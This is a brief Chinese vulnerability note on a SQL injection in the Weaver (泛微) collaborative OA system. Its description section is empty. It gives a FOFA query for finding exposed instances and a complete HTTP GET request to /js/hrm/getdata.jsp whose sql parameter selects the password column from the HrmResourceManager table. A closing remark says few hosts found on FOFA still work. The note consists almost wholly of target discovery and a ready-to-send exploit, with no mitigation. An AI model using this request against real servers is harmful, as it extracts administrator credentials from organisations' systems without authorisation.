0x00 漏洞描述
0x01 fofa语法
app=”泛微-协同办公OA”
0x02 漏洞详情
GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://IP/login/Login.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=abcKPQwz8VeaP9hDLT5Ix; testBanCookie=testConnection: close
0x03 总结
fofa上很少能用的
